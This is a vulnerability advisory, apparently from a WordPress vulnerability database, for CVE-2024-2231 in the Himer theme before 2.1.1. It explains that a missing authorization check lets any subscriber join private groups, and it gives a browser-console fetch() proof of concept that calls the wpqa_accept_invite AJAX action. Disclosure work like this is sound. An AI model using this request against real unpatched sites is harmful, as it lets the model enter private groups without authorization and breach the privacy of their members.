Himer – Social Questions and Answers < 2.1.1 – Subscriber+ Private Group Joining via IDOR | CVE 2024-2231 | Theme Vulnerabilities

Description

The theme allows any authenticated user to join a private group due to a missing authorization check on a function

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as user without access to a particular group. Replace GROUP_ID with a valid group:

```
fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=wpqa_accept_invite&group_id=1559',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
```

Affects Themes

Fixed in 2.1.1

References

CVE

YouTube Video

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Sushmita Poudel

Submitter

Sushmita Poudel

Submitter website

https://susmitapoudel.com.np

Submitter twitter

poudelsushmita1

Verified

Yes

WPVDB ID

119d2d93-3b71-4ce9-b385-4e6f57b162cb

Timeline

Publicly Published

2024-06-12 (about 1 year ago)

Added

2024-06-12 (about 1 year ago)

Last Updated

2025-08-21 (about 4 months ago)

Other

Published

Title

Published

2025-05-07

Title

Music Player for WooCommerce < 1.6.0 - Missing Authorization

Published

2023-01-16

Title

Stream < 3.9.2 - Subscriber+ Alert Creation

Published

2025-10-23

Title

ZoloBlocks < 2.3.12 - Missing Authorization to Unauthenticated Popup Enable/Disable

Published

2024-04-12

Title

Pardot < 2.1.1 - Missing Authorization

Published

2023-09-20

Title

Inactive Logout < 3.2.3 - Missing Authorization